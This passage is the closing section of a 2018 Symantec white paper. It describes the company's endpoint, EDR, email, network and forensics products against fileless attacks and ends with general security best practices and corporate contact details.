01 **Prevent:** Block the incursion or infection and prevent the damage from occurring.

02 **Contain:** Limit the spread of an attack in the event of a successful infection.

03 **Respond:** Have an incident response process, learn from the attack, and improve the defenses.

Preventing infection is by far the best outcome so it pays to pay attention to how infection can be prevented. Email and infected websites are the most common infection vectors for malware. Adopting a robust defense against both of these infection vectors will help reduce the risk of infection.

Symantec solutions use multiple security technologies to defend against file-less attacks including: endpoint security, endpoint detection and response, email security, and network security.

## Endpoint Security

- **Multilayered Security Engines**

  To protect endpoints against cyber attacks, Symantec Endpoint Protection (SEP) uses an array of security engines including: advanced machine learning, memory exploit mitigation, reputation analysis, behavior monitoring, emulator, firewall, intrusion prevention, just-in-time memory scanning, and more. This combination of file-less and file-based protection blocks sophisticated threats (including ones executed directly from memory) at various layers and on multiple devices, including both traditional and modern endpoints. In addition, Symantec's real-time behavior-based protection blocks malware and potentially malicious applications from running on the computer, all without requiring any specific signatures. Symantec's endpoint security can also detect malicious usage of dual-use tools, common to lateral movement, and block them.

- **Deception**

  Symantec Endpoint Protection includes deception technology that uses baits to expose hidden adversaries and reveal attacker intent, tactics, and targets. The adversarial intelligence can be used to modify security policies and improve security posture. Symantec Endpoint Protection Mobile (SEP Mobile) also uses a patented Active Honeypot technology which uses deception to protect against man-in-the-middle attacks on iOS and Android devices.

- **System Hardening**

  Symantec Endpoint Protection contains application & device control capabilities that can be used to harden a system. SEP also provides memory exploit mitigation that can protect against typical exploit techniques with an exploit agnostic approach. Also, Symantec offers application isolation technology via its SEP Hardening product. It automatically discovers and classifies applications and respective vulnerabilities with a risk score. This information is used to shield commonly used applications and isolate suspicious applications to prevent vulnerability exploits and malicious activity.

  From a server perspective, Symantec Data Center Security can secure physical and virtual servers and monitor the compliance posture of server systems for on-premise, public, and private cloud data centers.

## Endpoint Detection and Response (EDR)

- **EDR in Symantec Endpoint Protection (SEP)**

  Symantec Endpoint Detection and Response (EDR) gives investigators the tools to expose, contain, and resolve breaches resulting from advanced attacks. Symantec's EDR solution, ATP: Endpoint, exposes advanced attacks with precision machine learning, behavioral analytics, and threat intelligence, minimizing false positives and helping to ensure high levels of productivity for security teams.

  Symantec's EDR capabilities allow incident responders to quickly search, identify, and contain impacted endpoints while investigating threats using on-premises and cloud- based sandboxing. In addition, continuous recording of system activity supports full endpoint visibility and real-time queries. Additionally, Symantec's integrated EDR capabilities ensure breach resolution by deleting malware and associated artifacts from impacted endpoints, all from a single agent and console. SEP Mobile also uses the Mobile EDR functionality to protect against both known and unknown vulnerability exploits.

- **EDR for Non-SEP Environments**

  Symantec Endpoint Detection and Response (EDR) Cloud is a unique solution that delivers in-depth threat visibility and breach response across the entire enterprise. Symantec EDR Cloud can be deployed in minutes and helps to strengthen a firm's security posture against cyber attacks. Symantec EDR Cloud enhances investigator productivity with extensive rules and user behavior analytics that bring the skills and best practices of the most experienced security analysts to any organization, resulting in significantly lower costs without the overhead of an additional agent.

- **SEP Mobile**

  SEP Mobile offers mobile threat defense. It uses Mobile Network Access Control (mNAC) to automatically secure connections on suspicious public Wi-Fi networks, stop communication to and from malicious command and control centers, and automatically disconnect high-risk mobile devices from corporate networks. It also uses a patented Active Honeypot technology which uses deception to protect against man-in-the-middle attacks on iOS and Android devices.

**Email Security**

Symantec prevents fileless attacks both in the cloud and on-premises through Symantec Cloud Email Security and Symantec Messaging Gateway. The Symantec Cloud Email Security solution is a cloud-based solution that blocks fileless threats distributed over email with multilayered defense. Behavioral analysis identifies malicious scripts hidden inside documents by using file decomposition techniques to detect and extract scripts hiding in email attachments. For instance, it can identify a fileless attack that hides a malicious script in a PDF document, even if the PDF is inside another file such as a ZIP file. Symantec Cloud Email Security also uses link protection technologies to block malicious URLs in the body of an email or inside an attachment. It evaluates suspicious URLs in real-time, first when emails are delivered and again when URLs are clicked by users. On-premises email security via Symantec Messaging Gateway can also protect computers from fileless attacks through content disarming technology that removes malicious scripts and other active content from email attachments before they even reach users.

**Network Security**

Either on the endpoint with Symantec's Endpoint Protection built in firewall and IPS solution or in the network with the Secure Web Gateway and Content Analysis, monitoring and blocking malicious traffic entering or leaving a system can help minimize impacts of attacks. Suspicious content can be automatically analyzed through multiple layers of inspection and ultimately on sandboxes.

Content Analysis inspects files to detect malicious content using hash reputation from custom white and blacklists, Symantec's Advanced Machine Learning and dual antivirus/antimalware engines. If unknown content still remains after those layers of inspection, built-in or cloud sandboxing performs actual file detonation to determine the true nature of the file. This sandbox technology has the capability to analyze and block malicious content. It monitors the usage of system services such as BITS, WMI, or COM objects as well as various memory injection techniques. It can work its way through multiple layer of obfuscation and detect suspicious behavior, including various script languages.

SEP Mobile uses Mobile Network Access Control (mNAC) to automatically secure connections on suspicious public Wi-Fi networks, stop communication to and from malicious command and control centers, and automatically disconnect high-risk mobile devices from corporate networks.

**Visibility**

Gain visibility into your IT infrastructure and prepare for swift incident response with Symantec's network forensics solution, Security Analytics. Like a security camera or DVR for your network, it delivers enriched, full-packet capture for full network security visibility, advanced network forensics, anomaly detection, and real-time content inspection for all network traffic. Armed with this detailed record, you can conduct forensic investigations, respond quickly to incidents, and resolve breaches in a fraction of the time you would spend with conventional processes.

Use the advanced threat protection (ATP) product range to uncover advanced threats across endpoint, network, email, and web traffic and hunt for indicators of compromise (IoC) with Dynamic Adversary Intelligence on both traditional and modern endpoints.

## Best Practice

In addition, users are advised to follow these steps to ensure best possible security:

- Monitor the usage of dual-use tools inside your network
- Use application whitelisting where applicable
- Enable better logging, if available, and process the information
- Exercise caution when receiving unsolicited, unexpected, or suspicious emails
- Be wary of Microsoft Office attachments that prompt users to enable macros
- Keep security software and operating systems up to date
- Enable advanced account security features, like 2FA and login notification, if available
- Use strong passwords for all your accounts
- Always log out of your session when done
- Avoid conducting activities such as using apps that transmit sensitive information or logging into online accounts if using untrusted Wi-Fi networks
- Only download mobile apps from official app stores. Third-party app stores are more likely to contain malware

## About Symantec

Symantec Corporation (NASDAQ: SYMC), the world's leading cyber security company, helps businesses, governments and people secure their most important data wherever it lives. Organizations across the world look to Symantec for strategic, integrated solutions to defend against sophisticated attacks across endpoints, cloud and infrastructure.

Likewise, a global community of more than 50 million people and families rely on Symantec's Norton suite of products for protection at home and across all of their devices. Symantec operates one of the world's largest civilian cyber intelligence networks, allowing it to see and protect against the most advanced threats.

## More Information

Symantec Worldwide: http://www.symantec.com

ISTR and Symantec Intelligence Resources: https://www.symantec.com/security-center/threat-report

Symantec Security Center: https://www.symantec.com/security-center

Norton Security Center: https://us.norton.com/security-center

Symantec™

**Symantec Corporation**
**World Headquarters**
350 Ellis Street
Mountain View, CA 94043
United Stated of America

+1 (650) 527–8000
+1 (800) 721–3934

Symantec.com

Copyright © 2018
Symantec Corporation.

All rights reserved. Symantec, the Symantec Logo, and the Checkmark Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.

For specific country offices and contact numbers, please visit our website. For product information in the U.S., call toll-free 1 (800) 745 6054.

**02/18**